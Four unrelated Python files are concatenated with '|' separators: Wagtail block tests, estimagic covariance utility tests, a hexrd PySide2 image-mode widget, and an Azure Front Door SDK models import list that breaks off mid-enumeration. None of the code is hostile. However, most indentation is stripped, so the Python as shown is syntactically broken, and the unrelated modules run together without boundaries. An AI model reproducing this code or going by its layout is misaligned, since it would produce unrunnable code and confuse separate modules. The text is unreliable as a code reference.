self.assertIn('<script>initDateChooser("dateblock", {', result)
self.assertIn('"dayOfWeekStart": 0', result)
self.assertIn('"format": "Y-m-d"', result)
self.assertInHTML(
'<input id="dateblock" name="dateblock" placeholder="" type="text" value="2015-08-13" autocomplete="off" />',
result
)
def test_render_form_with_format(self):
block = blocks.DateBlock(format='%d.%m.%Y')
value = date(2015, 8, 13)
result = block.render_form(value, prefix='dateblock')
self.assertIn('<script>initDateChooser("dateblock", {', result)
self.assertIn('"dayOfWeekStart": 0', result)
self.assertIn('"format": "d.m.Y"', result)
self.assertInHTML(
'<input id="dateblock" name="dateblock" placeholder="" type="text" value="13.08.2015" autocomplete="off" />',
result
)
class TestDateTimeBlock(TestCase):
def test_render_form_with_format(self):
block = blocks.DateTimeBlock(format='%d.%m.%Y %H:%M')
value = datetime(2015, 8, 13, 10, 0)
result = block.render_form(value, prefix='datetimeblock')
self.assertIn(
'"format": "d.m.Y H:i"',
result
)
self.assertInHTML(
'<input id="datetimeblock" name="datetimeblock" placeholder="" type="text" value="13.08.2015 10:00" autocomplete="off" />',
result
)
class TestSystemCheck(TestCase):
def test_name_cannot_contain_non_alphanumeric(self):
block = blocks.StreamBlock([
('heading', blocks.CharBlock()),
('rich+text', blocks.RichTextBlock()),
])
errors = block.check()
self.assertEqual(len(errors), 1)
self.assertEqual(errors[0].id, 'wagtailcore.E001')
self.assertEqual(errors[0].hint, "Block names should follow standard Python conventions for variable names: alpha-numeric and underscores, and cannot begin with a digit")
self.assertEqual(errors[0].obj, block.child_blocks['rich+text'])
def test_name_must_be_nonempty(self):
block = blocks.StreamBlock([
('heading', blocks.CharBlock()),
('', blocks.RichTextBlock()),
])
errors = block.check()
self.assertEqual(len(errors), 1)
self.assertEqual(errors[0].id, 'wagtailcore.E001')
self.assertEqual(errors[0].hint, "Block name cannot be empty")
self.assertEqual(errors[0].obj, block.child_blocks[''])
def test_name_cannot_contain_spaces(self):
block = blocks.StreamBlock([
('heading', blocks.CharBlock()),
('rich text', blocks.RichTextBlock()),
])
errors = block.check()
self.assertEqual(len(errors), 1)
self.assertEqual(errors[0].id, 'wagtailcore.E001')
self.assertEqual(errors[0].hint, "Block names cannot contain spaces")
self.assertEqual(errors[0].obj, block.child_blocks['rich text'])
def test_name_cannot_contain_dashes(self):
block = blocks.StreamBlock([
('heading', blocks.CharBlock()),
('rich-text', blocks.RichTextBlock()),
])
errors = block.check()
self.assertEqual(len(errors), 1)
self.assertEqual(errors[0].id, 'wagtailcore.E001')
self.assertEqual(errors[0].hint, "Block names cannot contain dashes")
self.assertEqual(errors[0].obj, block.child_blocks['rich-text'])
def test_name_cannot_begin_with_digit(self):
block = blocks.StreamBlock([
('heading', blocks.CharBlock()),
('99richtext', blocks.RichTextBlock()),
])
errors = block.check()
self.assertEqual(len(errors), 1)
self.assertEqual(errors[0].id, 'wagtailcore.E001')
self.assertEqual(errors[0].hint, "Block names cannot begin with a digit")
self.assertEqual(errors[0].obj, block.child_blocks['99richtext'])
def test_system_checks_recurse_into_lists(self):
failing_block = blocks.RichTextBlock()
block = blocks.StreamBlock([
('paragraph_list', blocks.ListBlock(
blocks.StructBlock([
('heading', blocks.CharBlock()),
('rich text', failing_block),
])
))
])
errors = block.check()
self.assertEqual(len(errors), 1)
self.assertEqual(errors[0].id, 'wagtailcore.E001')
self.assertEqual(errors[0].hint, "Block names cannot contain spaces")
self.assertEqual(errors[0].obj, failing_block)
def test_system_checks_recurse_into_streams(self):
failing_block = blocks.RichTextBlock()
block = blocks.StreamBlock([
('carousel', blocks.StreamBlock([
('text', blocks.StructBlock([
('heading', blocks.CharBlock()),
('rich text', failing_block),
]))
]))
])
errors = block.check()
self.assertEqual(len(errors), 1)
self.assertEqual(errors[0].id, 'wagtailcore.E001')
self.assertEqual(errors[0].hint, "Block names cannot contain spaces")
self.assertEqual(errors[0].obj, failing_block)
def test_system_checks_recurse_into_structs(self):
failing_block_1 = blocks.RichTextBlock()
failing_block_2 = blocks.RichTextBlock()
block = blocks.StreamBlock([
('two_column', blocks.StructBlock([
('left', blocks.StructBlock([
('heading', blocks.CharBlock()),
('rich text', failing_block_1),
])),
('right', blocks.StructBlock([
('heading', blocks.CharBlock()),
('rich text', failing_block_2),
]))
]))
])
errors = block.check()
self.assertEqual(len(errors), 2)
self.assertEqual(errors[0].id, 'wagtailcore.E001')
self.assertEqual(errors[0].hint, "Block names cannot contain spaces")
self.assertEqual(errors[0].obj, failing_block_1)
self.assertEqual(errors[1].id, 'wagtailcore.E001')
self.assertEqual(errors[1].hint, "Block names cannot contain spaces")
self.assertEqual(errors[1].obj, failing_block_2)
class TestTemplateRendering(TestCase):
def test_render_with_custom_context(self):
block = CustomLinkBlock()
value = block.to_python({'title': 'Torchbox', 'url': 'http://torchbox.com/'})
context = {'classname': 'important'}
result = block.render(value, context)
self.assertEqual(result, '<a href="http://torchbox.com/" class="important">Torchbox</a>')
def test_render_with_custom_form_context(self):
block = CustomLinkBlock()
value = block.to_python({'title': 'Torchbox', 'url': 'http://torchbox.com/'})
result = block.render_form(value, prefix='my-link-block')
self.assertIn('data-prefix="my-link-block"', result)
self.assertIn('<p>Hello from get_form_context!</p>', result)
class TestIncludeBlockTag(TestCase):
def test_include_block_tag_with_boundblock(self):
"""
The include_block tag should be able to render a BoundBlock's template
while keeping the parent template's context
"""
block = blocks.CharBlock(template='tests/blocks/heading_block.html')
bound_block = block.bind('bonjour')
result = render_to_string('tests/blocks/include_block_test.html', {
'test_block': bound_block,
'language': 'fr',
})
self.assertIn('<body><h1 lang="fr">bonjour</h1></body>', result)
def test_include_block_tag_with_structvalue(self):
"""
The include_block tag should be able to render a StructValue's template
while keeping the parent template's context
"""
block = SectionBlock()
struct_value = block.to_python({'title': 'Bonjour', 'body': 'monde <i>italique</i>'})
result = render_to_string('tests/blocks/include_block_test.html', {
'test_block': struct_value,
'language': 'fr',
})
self.assertIn(
"""<body><h1 lang="fr">Bonjour</h1>monde <i>italique</i></body>""",
result
)
def test_include_block_tag_with_streamvalue(self):
"""
The include_block tag should be able to render a StreamValue's template
while keeping the parent template's context
"""
block = blocks.StreamBlock([
('heading', blocks.CharBlock(template='tests/blocks/heading_block.html')),
('paragraph', blocks.CharBlock()),
], template='tests/blocks/stream_with_language.html')
stream_value = block.to_python([
{'type': 'heading', 'value': 'Bonjour'}
])
result = render_to_string('tests/blocks/include_block_test.html', {
'test_block': stream_value,
'language': 'fr',
})
self.assertIn('<div class="heading" lang="fr"><h1 lang="fr">Bonjour</h1></div>', result)
def test_include_block_tag_with_plain_value(self):
"""
The include_block tag should be able to render a value without a render_as_block method
by just rendering it as a string
"""
result = render_to_string('tests/blocks/include_block_test.html', {
'test_block': 42,
})
self.assertIn('<body>42</body>', result)
def test_include_block_tag_with_filtered_value(self):
"""
The block parameter on include_block tag should support complex values including filters,
e.g. {% include_block foo|default:123 %}
"""
block = blocks.CharBlock(template='tests/blocks/heading_block.html')
bound_block = block.bind('bonjour')
result = render_to_string('tests/blocks/include_block_test_with_filter.html', {
'test_block': bound_block,
'language': 'fr',
})
self.assertIn('<body><h1 lang="fr">bonjour</h1></body>', result)
result = render_to_string('tests/blocks/include_block_test_with_filter.html', {
'test_block': None,
'language': 'fr',
})
self.assertIn('<body>999</body>', result)
def test_include_block_tag_with_extra_context(self):
"""
Test that it's possible to pass extra context on an include_block tag using
{% include_block foo with classname="bar" %}
"""
block = blocks.CharBlock(template='tests/blocks/heading_block.html')
bound_block = block.bind('bonjour')
result = render_to_string('tests/blocks/include_block_with_test.html', {
'test_block': bound_block,
'language': 'fr',
})
self.assertIn('<body><h1 lang="fr" class="important">bonjour</h1></body>', result)
def test_include_block_tag_with_only_flag(self):
"""
A tag such as {% include_block foo with classname="bar" only %}
should not inherit the parent context
"""
block = blocks.CharBlock(template='tests/blocks/heading_block.html')
bound_block = block.bind('bonjour')
result = render_to_string('tests/blocks/include_block_only_test.html', {
'test_block': bound_block,
'language': 'fr',
})
self.assertIn('<body><h1 class="important">bonjour</h1></body>', result)
class BlockUsingGetTemplateMethod(blocks.Block):
my_new_template = "my_super_awesome_dynamic_template.html"
def get_template(self):
return self.my_new_template
class TestOverriddenGetTemplateBlockTag(TestCase):
def test_template_is_overriden_by_get_template(self):
block = BlockUsingGetTemplateMethod(template='tests/blocks/this_shouldnt_be_used.html')
template = block.get_template()
self.assertEqual(template, block.my_new_template)
|
import numpy as np
import pandas as pd
import pytest
from numpy.testing import assert_array_almost_equal as aaae
from estimagic.config import IS_CYIPOPT_INSTALLED
from estimagic.config import IS_DFOLS_INSTALLED
from estimagic.config import IS_PETSC4PY_INSTALLED
from estimagic.config import IS_PYBOBYQA_INSTALLED
from estimagic.config import IS_PYGMO_INSTALLED
from estimagic.optimization import AVAILABLE_ALGORITHMS
from estimagic.utilities import calculate_trustregion_initial_radius
from estimagic.utilities import chol_params_to_lower_triangular_matrix
from estimagic.utilities import cov_matrix_to_params
from estimagic.utilities import cov_matrix_to_sdcorr_params
from estimagic.utilities import cov_params_to_matrix
from estimagic.utilities import cov_to_sds_and_corr
from estimagic.utilities import dimension_to_number_of_triangular_elements
from estimagic.utilities import hash_array
from estimagic.utilities import number_of_triangular_elements_to_dimension
from estimagic.utilities import robust_cholesky
from estimagic.utilities import robust_inverse
from estimagic.utilities import sdcorr_params_to_matrix
from estimagic.utilities import sdcorr_params_to_sds_and_corr
from estimagic.utilities import sds_and_corr_to_cov
def test_chol_params_to_lower_triangular_matrix():
calculated = chol_params_to_lower_triangular_matrix(pd.Series([1, 2, 3]))
expected = np.array([[1, 0], [2, 3]])
aaae(calculated, expected)
def test_cov_params_to_matrix():
params = np.array([1, 0.1, 2, 0.2, 0.22, 3])
expected = np.array([[1, 0.1, 0.2], [0.1, 2, 0.22], [0.2, 0.22, 3]])
calculated = cov_params_to_matrix(params)
aaae(calculated, expected)
def test_cov_matrix_to_params():
expected = np.array([1, 0.1, 2, 0.2, 0.22, 3])
cov = np.array([[1, 0.1, 0.2], [0.1, 2, 0.22], [0.2, 0.22, 3]])
calculated = cov_matrix_to_params(cov)
aaae(calculated, expected)
def test_sdcorr_params_to_sds_and_corr():
sdcorr_params = pd.Series([1, 2, 3, 0.1, 0.2, 0.3])
exp_corr = np.array([[1, 0.1, 0.2], [0.1, 1, 0.3], [0.2, 0.3, 1]])
exp_sds = np.array([1, 2, 3])
calc_sds, calc_corr = sdcorr_params_to_sds_and_corr(sdcorr_params)
aaae(calc_sds, exp_sds)
aaae(calc_corr, exp_corr)
def test_sdcorr_params_to_matrix():
sds = np.sqrt([1, 2, 3])
corrs = [0.07071068, 0.11547005, 0.08981462]
params = np.hstack([sds, corrs])
expected = np.array([[1, 0.1, 0.2], [0.1, 2, 0.22], [0.2, 0.22, 3]])
calculated = sdcorr_params_to_matrix(params)
aaae(calculated, expected)
def test_cov_matrix_to_sdcorr_params():
sds = np.sqrt([1, 2, 3])
corrs = [0.07071068, 0.11547005, 0.08981462]
expected = np.hstack([sds, corrs])
cov = np.array([[1, 0.1, 0.2], [0.1, 2, 0.22], [0.2, 0.22, 3]])
calculated = cov_matrix_to_sdcorr_params(cov)
aaae(calculated, expected)
def test_sds_and_corr_to_cov():
sds = [1, 2, 3]
corr = np.ones((3, 3)) * 0.2
corr[np.diag_indices(3)] = 1
calculated = sds_and_corr_to_cov(sds, corr)
expected = np.array([[1.0, 0.4, 0.6], [0.4, 4.0, 1.2], [0.6, 1.2, 9.0]])
aaae(calculated, expected)
def test_cov_to_sds_and_corr():
cov = np.array([[1.0, 0.4, 0.6], [0.4, 4.0, 1.2], [0.6, 1.2, 9.0]])
calc_sds, calc_corr = cov_to_sds_and_corr(cov)
exp_sds = [1, 2, 3]
exp_corr = np.ones((3, 3)) * 0.2
exp_corr[np.diag_indices(3)] = 1
aaae(calc_sds, exp_sds)
aaae(calc_corr, exp_corr)
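# The next two tests cover inverse conversions: a symmetric matrix of dimension d
# has d * (d + 1) / 2 triangular elements, e.g. d = 3 gives 3 * 4 / 2 = 6.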
def test_number_of_triangular_elements_to_dimension():
inputs = [6, 10, 15, 21]
expected = [3, 4, 5, 6]
for inp, exp in zip(inputs, expected):
assert number_of_triangular_elements_to_dimension(inp) == exp
def test_dimension_to_number_of_triangular_elements():
inputs = [3, 4, 5, 6]
expected = [6, 10, 15, 21]
for inp, exp in zip(inputs, expected):
assert dimension_to_number_of_triangular_elements(inp) == exp
def random_cov(dim, seed):
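    """Build a random positive semi-definite dim x dim covariance matrix, then zero
    out int(dim / 5) randomly chosen rows and columns so that the matrix contains
    zero-variance entries."""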
np.random.seed(seed)
num_elements = int(dim * (dim + 1) / 2)
chol = np.zeros((dim, dim))
chol[np.tril_indices(dim)] = np.random.uniform(size=num_elements)
cov = chol @ chol.T
zero_positions = np.random.choice(range(dim), size=int(dim / 5), replace=False)
for pos in zero_positions:
cov[:, pos] = 0
cov[pos] = 0
return cov
seeds = [58822, 3181, 98855, 44002, 47631, 97741, 10655, 4600, 1151, 58189]
dims = [8] * 6 + [10, 12, 15, 20]
@pytest.mark.parametrize("dim, seed", zip(dims, seeds))
def test_robust_cholesky_with_zero_variance(dim, seed):
cov = random_cov(dim, seed)
chol = robust_cholesky(cov)
aaae(chol.dot(chol.T), cov)
assert (chol[np.triu_indices(len(cov), k=1)] == 0).all()
def test_robust_cholesky_with_extreme_cases():
for cov in [np.ones((5, 5)), np.zeros((5, 5))]:
chol = robust_cholesky(cov)
aaae(chol.dot(chol.T), cov)
def test_robust_inverse_nonsingular():
mat = np.eye(3) + 0.2
expected = np.linalg.inv(mat)
calculated = robust_inverse(mat)
aaae(calculated, expected)
def test_robust_inverse_singular():
mat = np.zeros((5, 5))
expected = np.zeros((5, 5))
with pytest.warns(UserWarning, match="LinAlgError"):
calculated = robust_inverse(mat)
aaae(calculated, expected)
def test_hash_array():
arr1 = np.arange(4)[::2]
arr2 = np.array([0, 2])
arr3 = np.array([0, 3])
assert hash_array(arr1) == hash_array(arr2)
assert hash_array(arr1) != hash_array(arr3)
def test_initial_trust_radius_small_x():
x = np.array([0.01, 0.01])
expected = 0.1
res = calculate_trustregion_initial_radius(x)
assert expected == pytest.approx(res, abs=1e-8)
def test_initial_trust_radius_large_x():
x = np.array([20.5, 10])
expected = 2.05
res = calculate_trustregion_initial_radius(x)
assert expected == pytest.approx(res, abs=1e-8)
def test_available_algorithms():
present_algo_names = AVAILABLE_ALGORITHMS.keys()
assert "scipy_lbfgsb" in present_algo_names
assert ("nag_dfols" in present_algo_names) is IS_DFOLS_INSTALLED
assert ("tao_pounders" in present_algo_names) is IS_PETSC4PY_INSTALLED
assert ("nag_pybobyqa" in present_algo_names) is IS_PYBOBYQA_INSTALLED
assert ("pygmo_gaco" in present_algo_names) is IS_PYGMO_INSTALLED
assert ("ipopt" in present_algo_names) is IS_CYIPOPT_INSTALLED
assert "get_scipy_bounds" not in present_algo_names
|
import copy
from functools import partial
import multiprocessing
import numpy as np
from PySide2.QtCore import QObject, QSignalBlocker, Signal
from hexrd.ui.constants import ViewType
from hexrd.ui.create_hedm_instrument import create_hedm_instrument
from hexrd.ui.create_raw_mask import apply_threshold_mask, remove_threshold_mask
from hexrd.ui.hexrd_config import HexrdConfig
from hexrd.ui.ui_loader import UiLoader
class ImageModeWidget(QObject):
    # Using string argument instead of ViewType to work around segfault on
# conda/macos
tab_changed = Signal(str)
# Tell the image canvas to show the snip1d
polar_show_snip1d = Signal()
# Mask has been applied
mask_applied = Signal()
def __init__(self, parent=None):
super(ImageModeWidget, self).__init__(parent)
loader = UiLoader()
self.ui = loader.load_file('image_mode_widget.ui', parent)
# Always start with raw tab
self.ui.tab_widget.setCurrentIndex(0)
self.setup_connections()
self.update_gui_from_config()
def setup_connections(self):
self.ui.raw_tabbed_view.toggled.connect(HexrdConfig().set_tab_images)
self.ui.raw_show_saturation.toggled.connect(
HexrdConfig().set_show_saturation_level)
self.ui.raw_threshold_mask.toggled.connect(self.raw_masking)
self.ui.raw_threshold_mask.toggled.connect(
HexrdConfig().set_threshold_mask_status)
self.ui.raw_threshold_comparison.currentIndexChanged.connect(
HexrdConfig().set_threshold_comparison)
self.ui.raw_threshold_comparison.currentIndexChanged.connect(
self.update_mask)
self.ui.raw_threshold_value.valueChanged.connect(
HexrdConfig().set_threshold_value)
self.ui.raw_threshold_value.valueChanged.connect(
self.update_mask)
self.ui.cartesian_pixel_size.valueChanged.connect(
HexrdConfig()._set_cartesian_pixel_size)
self.ui.cartesian_virtual_plane_distance.valueChanged.connect(
HexrdConfig().set_cartesian_virtual_plane_distance)
self.ui.cartesian_plane_normal_rotate_x.valueChanged.connect(
HexrdConfig().set_cartesian_plane_normal_rotate_x)
self.ui.cartesian_plane_normal_rotate_y.valueChanged.connect(
HexrdConfig().set_cartesian_plane_normal_rotate_y)
self.ui.polar_pixel_size_tth.valueChanged.connect(
HexrdConfig()._set_polar_pixel_size_tth)
self.ui.polar_pixel_size_eta.valueChanged.connect(
HexrdConfig()._set_polar_pixel_size_eta)
self.ui.polar_res_tth_min.valueChanged.connect(
HexrdConfig().set_polar_res_tth_min)
self.ui.polar_res_tth_max.valueChanged.connect(
HexrdConfig().set_polar_res_tth_max)
self.ui.polar_apply_snip1d.toggled.connect(
HexrdConfig().set_polar_apply_snip1d)
self.ui.polar_snip1d_width.valueChanged.connect(
HexrdConfig().set_polar_snip1d_width)
self.ui.polar_snip1d_numiter.valueChanged.connect(
HexrdConfig().set_polar_snip1d_numiter)
HexrdConfig().instrument_config_loaded.connect(
self.auto_generate_cartesian_params)
HexrdConfig().instrument_config_loaded.connect(
self.auto_generate_polar_params)
self.ui.polar_show_snip1d.clicked.connect(self.polar_show_snip1d.emit)
self.ui.tab_widget.currentChanged.connect(self.currentChanged)
HexrdConfig().threshold_mask_changed.connect(
self.ui.raw_threshold_mask.setChecked)
def currentChanged(self, index):
modes = {
0: ViewType.raw,
1: ViewType.cartesian,
2: ViewType.polar
}
ind = self.ui.tab_widget.currentIndex()
self.tab_changed.emit(modes[ind])
def all_widgets(self):
widgets = [
self.ui.raw_tabbed_view,
self.ui.raw_show_saturation,
self.ui.raw_threshold_mask,
self.ui.raw_threshold_comparison,
self.ui.raw_threshold_value,
self.ui.cartesian_pixel_size,
self.ui.cartesian_virtual_plane_distance,
self.ui.cartesian_plane_normal_rotate_x,
self.ui.cartesian_plane_normal_rotate_y,
self.ui.polar_pixel_size_tth,
self.ui.polar_pixel_size_eta,
self.ui.polar_res_tth_min,
self.ui.polar_res_tth_max,
self.ui.polar_apply_snip1d,
self.ui.polar_snip1d_width,
self.ui.polar_snip1d_numiter,
self.ui.polar_show_snip1d
]
return widgets
def update_gui_from_config(self):
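        # Keep the QSignalBlocker instances alive for the duration of this method so
        # that the setValue()/setChecked() calls below do not emit change signals
        # (hence the unused-variable noqa on the next line).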
blocked = [QSignalBlocker(x) for x in self.all_widgets()] # noqa: F841
self.ui.raw_threshold_comparison.setCurrentIndex(
HexrdConfig().threshold_comparison)
self.ui.raw_threshold_value.setValue(
HexrdConfig().threshold_value)
self.ui.raw_threshold_mask.setChecked(
HexrdConfig().threshold_mask_status)
self.ui.cartesian_pixel_size.setValue(
HexrdConfig().cartesian_pixel_size)
self.ui.cartesian_virtual_plane_distance.setValue(
HexrdConfig().cartesian_virtual_plane_distance)
self.ui.cartesian_plane_normal_rotate_x.setValue(
HexrdConfig().cartesian_plane_normal_rotate_x)
self.ui.cartesian_plane_normal_rotate_y.setValue(
HexrdConfig().cartesian_plane_normal_rotate_y)
self.ui.polar_pixel_size_tth.setValue(
HexrdConfig().polar_pixel_size_tth)
self.ui.polar_pixel_size_eta.setValue(
HexrdConfig().polar_pixel_size_eta)
self.ui.polar_res_tth_min.setValue(
HexrdConfig().polar_res_tth_min)
self.ui.polar_res_tth_max.setValue(
HexrdConfig().polar_res_tth_max)
self.ui.polar_apply_snip1d.setChecked(
HexrdConfig().polar_apply_snip1d)
self.ui.polar_snip1d_width.setValue(
HexrdConfig().polar_snip1d_width)
self.ui.polar_snip1d_numiter.setValue(
HexrdConfig().polar_snip1d_numiter)
def auto_generate_cartesian_params(self):
# This will automatically generate and set values for the
# Cartesian pixel size and virtual plane distance based upon
# values in the instrument config.
# This function does not invoke a re-render.
detectors = list(HexrdConfig().detectors.values())
distances = [
x['transform']['translation']['value'][2] for x in detectors
]
sizes = [x['pixels']['size']['value'] for x in detectors]
average_dist = sum(distances) / len(distances)
average_size = sum([x[0] + x[1] for x in sizes]) / (2 * len(sizes))
cart_config = HexrdConfig().config['image']['cartesian']
cart_config['pixel_size'] = average_size * 5
cart_config['virtual_plane_distance'] = abs(average_dist)
# Get the GUI to update with the new values
self.update_gui_from_config()
def auto_generate_polar_params(self):
# This will automatically generate and set values for the polar
# pixel values based upon the config.
# This function does not invoke a re-render.
manager = multiprocessing.Manager()
keys = ['max_tth_ps', 'max_eta_ps', 'min_tth', 'max_tth']
results = {key: manager.list() for key in keys}
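        # The manager-backed lists are shared with the worker processes, so
        # compute_polar_params can append one entry per detector from each worker.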
f = partial(compute_polar_params, **results)
instr = create_hedm_instrument()
with multiprocessing.Pool() as pool:
pool.map(f, instr.detectors.values())
        # Set these manually so no re-render signals are fired
params = {
'pixel_size_tth': 10 * np.degrees(max(results['max_tth_ps'])),
'pixel_size_eta': 2 * np.degrees(max(results['max_eta_ps'])),
'tth_min': np.degrees(min(results['min_tth'])),
'tth_max': np.degrees(max(results['max_tth']))
}
# Sometimes, this is too big. Bring it down if it is.
px_eta = params['pixel_size_eta']
params['pixel_size_eta'] = px_eta if px_eta < 90 else 5
HexrdConfig().config['image']['polar'].update(params)
# Update all of the materials with the new tth_max
HexrdConfig().reset_tth_max_all_materials()
# Get the GUI to update with the new values
self.update_gui_from_config()
def raw_masking(self, checked):
# Toggle threshold masking on or off
# Creates a copy of the ImageSeries dict so that the images can
# easily be reverted to their original state if the mask is
# toggled off.
self.ui.raw_threshold_comparison.setEnabled(checked)
self.ui.raw_threshold_comparison.setCurrentIndex(
HexrdConfig().threshold_comparison)
self.ui.raw_threshold_value.setEnabled(checked)
self.ui.raw_threshold_value.setValue(HexrdConfig().threshold_value)
if not hasattr(self, 'ims_copy') or self.ims_copy is None:
self.ims_copy = copy.copy(HexrdConfig().imageseries_dict)
self.update_mask(checked)
def update_mask(self, masking):
# Add or remove the mask. This will cause a re-render
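        # This slot is also wired to currentIndexChanged/valueChanged, which pass
        # numbers rather than booleans; any non-bool argument re-applies the mask.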
if not isinstance(masking, bool) or masking:
apply_threshold_mask(self.ims_copy)
else:
remove_threshold_mask(self.ims_copy)
self.ims_copy = None
self.mask_applied.emit()
def reset_masking(self, checked=False):
self.ui.raw_threshold_mask.setChecked(checked)
def compute_polar_params(panel, max_tth_ps, max_eta_ps, min_tth, max_tth):
# Other than panel, all arguments are lists for appending results
# pixel sizes
ang_ps = panel.angularPixelSize(
np.vstack([i.flatten() for i in panel.pixel_coords]).T
)
max_tth_ps.append(np.max(ang_ps[:, 0]))
max_eta_ps.append(np.max(ang_ps[:, 1]))
# tth ranges
ptth, peta = panel.pixel_angles()
min_tth.append(np.min(ptth))
max_tth.append(np.max(ptth))
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
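# Prefer the ._models_py3 definitions; if importing them fails (e.g. SyntaxError
# under Python 2), fall back to the equivalent ._models definitions below.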
try:
from ._models_py3 import AzureAsyncOperationResult
from ._models_py3 import Backend
from ._models_py3 import BackendPool
from ._models_py3 import BackendPoolListResult
from ._models_py3 import BackendPoolsSettings
from ._models_py3 import BackendPoolUpdateParameters
from ._models_py3 import CacheConfiguration
from ._models_py3 import CheckNameAvailabilityInput
from ._models_py3 import CheckNameAvailabilityOutput
from ._models_py3 import CustomHttpsConfiguration
from ._models_py3 import CustomRule
from ._models_py3 import CustomRuleList
from ._models_py3 import Endpoint
from ._models_py3 import Error
from ._models_py3 import ErrorDetails
from ._models_py3 import ErrorResponse, ErrorResponseException
from ._models_py3 import Experiment
from ._models_py3 import ExperimentUpdateModel
from ._models_py3 import ForwardingConfiguration
from ._models_py3 import FrontDoor
from ._models_py3 import FrontDoorUpdateParameters
from ._models_py3 import FrontendEndpoint
from ._models_py3 import FrontendEndpointLink
from ._models_py3 import FrontendEndpointUpdateParameters
from ._models_py3 import FrontendEndpointUpdateParametersWebApplicationFirewallPolicyLink
from ._models_py3 import HeaderAction
from ._models_py3 import HealthProbeSettingsListResult
from ._models_py3 import HealthProbeSettingsModel
from ._models_py3 import HealthProbeSettingsUpdateParameters
from ._models_py3 import KeyVaultCertificateSourceParametersVault
from ._models_py3 import LatencyMetric
from ._models_py3 import LatencyScorecard
from ._models_py3 import LoadBalancingSettingsListResult
from ._models_py3 import LoadBalancingSettingsModel
from ._models_py3 import LoadBalancingSettingsUpdateParameters
from ._models_py3 import ManagedRuleDefinition
from ._models_py3 import ManagedRuleExclusion
from ._models_py3 import ManagedRuleGroupDefinition
from ._models_py3 import ManagedRuleGroupOverride
from ._models_py3 import ManagedRuleOverride
from ._models_py3 import ManagedRuleSet
from ._models_py3 import ManagedRuleSetDefinition
from ._models_py3 import ManagedRuleSetList
from ._models_py3 import MatchCondition
from ._models_py3 import PolicySettings
from ._models_py3 import PreconfiguredEndpoint
from ._models_py3 import Profile
from ._models_py3 import ProfileUpdateModel
from ._models_py3 import PurgeParameters
from ._models_py3 import RedirectConfiguration
from ._models_py3 import Resource
from ._models_py3 import RouteConfiguration
from ._models_py3 import RoutingRule
from ._models_py3 import RoutingRuleLink
from ._models_py3 import RoutingRuleListResult
from ._models_py3 import RoutingRuleUpdateParameters
from ._models_py3 import RoutingRuleUpdateParametersWebApplicationFirewallPolicyLink
from ._models_py3 import RulesEngine
from ._models_py3 import RulesEngineAction
from ._models_py3 import RulesEngineMatchCondition
from ._models_py3 import RulesEngineRule
from ._models_py3 import RulesEngineUpdateParameters
from ._models_py3 import SubResource
from ._models_py3 import TagsObject
from ._models_py3 import Timeseries
from ._models_py3 import TimeseriesDataPoint
from ._models_py3 import ValidateCustomDomainInput
from ._models_py3 import ValidateCustomDomainOutput
from ._models_py3 import WebApplicationFirewallPolicy
except (SyntaxError, ImportError):
from ._models import AzureAsyncOperationResult
from ._models import Backend
from ._models import BackendPool
from ._models import BackendPoolListResult
from ._models import BackendPoolsSettings
from ._models import BackendPoolUpdateParameters
from ._models import CacheConfiguration
from ._models import CheckNameAvailabilityInput
from ._models import CheckNameAvailabilityOutput
from ._models import CustomHttpsConfiguration
from ._models import CustomRule
from ._models import CustomRuleList
from ._models import Endpoint
from ._models import Error
from ._models import ErrorDetails
from ._models import ErrorResponse, ErrorResponseException
from ._models import Experiment
from ._models import ExperimentUpdateModel
from ._models import ForwardingConfiguration
from ._models import FrontDoor
from ._models import FrontDoorUpdateParameters
from ._models import FrontendEndpoint
from ._models import FrontendEndpointLink
from ._models import FrontendEndpointUpdateParameters
from ._models import FrontendEndpointUpdateParametersWebApplicationFirewallPolicyLink
from ._models import HeaderAction
from ._models import HealthProbeSettingsListResult
from ._models import HealthProbeSettingsModel
from ._models import HealthProbeSettingsUpdateParameters
from ._models import KeyVaultCertificateSourceParametersVault
from ._models import LatencyMetric
from ._models import LatencyScorecard
from ._models import LoadBalancingSettingsListResult
from ._models import LoadBalancingSettingsModel
from ._models import LoadBalancingSettingsUpdateParameters
from ._models import ManagedRuleDefinition
from ._models import ManagedRuleExclusion
from ._models import ManagedRuleGroupDefinition
from ._models import ManagedRuleGroupOverride
from ._models import ManagedRuleOverride
from ._models import ManagedRuleSet
from ._models import ManagedRuleSetDefinition
from ._models import ManagedRuleSetList
from ._models import MatchCondition
from ._models import PolicySettings
from ._models import PreconfiguredEndpoint
from ._models import Profile
from ._models import ProfileUpdateModel
from ._models import PurgeParameters
from ._models import RedirectConfiguration
from ._models import Resource
from ._models import RouteConfiguration
from ._models import RoutingRule
from ._models import RoutingRuleLink
from ._models import RoutingRuleListResult
from ._models import RoutingRuleUpdateParameters
from ._models import RoutingRuleUpdateParametersWebApplicationFirewallPolicyLink
from ._models import RulesEngine
from ._models import RulesEngineAction
from ._models import RulesEngineMatchCondition
from ._models import RulesEngineRule
from ._models import RulesEngineUpdateParameters
from ._models import SubResource
from ._models import TagsObject
from ._models import Timeseries
from ._models import TimeseriesDataPoint
from ._models import ValidateCustomDomainInput
from ._models import ValidateCustomDomainOutput
from ._models import WebApplicationFirewallPolicy
from ._paged_models import ExperimentPaged
from ._paged_models import FrontDoorPaged
from ._paged_models import FrontendEndpointPaged
from ._paged_models import ManagedRuleSetDefinitionPaged
from ._paged_models import PreconfiguredEndpointPaged
from ._paged_models import ProfilePaged
from ._paged_models import RulesEnginePaged
from ._paged_models import WebApplicationFirewallPolicyPaged
from ._front_door_management_client_enums import (
NetworkOperationStatus,
NetworkExperimentResourceState,
State,
AggregationInterval,
TimeseriesType,
EndpointType,
FrontDoorResourceState,
CustomHttpsProvisioningState,
CustomHttpsProvisioningSubstate,
FrontDoorCertificateSource,
MinimumTLSVersion,
FrontDoorCertificateType,
EnforceCertificateNameCheckEnabledState,
FrontDoorEnabledState,
FrontDoorProtocol,
RoutingRuleEnabledState,
FrontDoorForwardingProtocol,
FrontDoorQuery,
DynamicCompressionEnabled,
FrontDoorRedirectType,
FrontDoorRedirectProtocol,
PrivateEndpointStatus,
BackendEnabledState,
FrontDoorHealthProbeMethod,
HealthProbeEnabled,
SessionAffinityEnabledState,
HeaderActionType,
RulesEngineMatchVariable,
RulesEngineOperator,
Transform,
MatchProcessingBehavior,
ResourceType,
Availability,
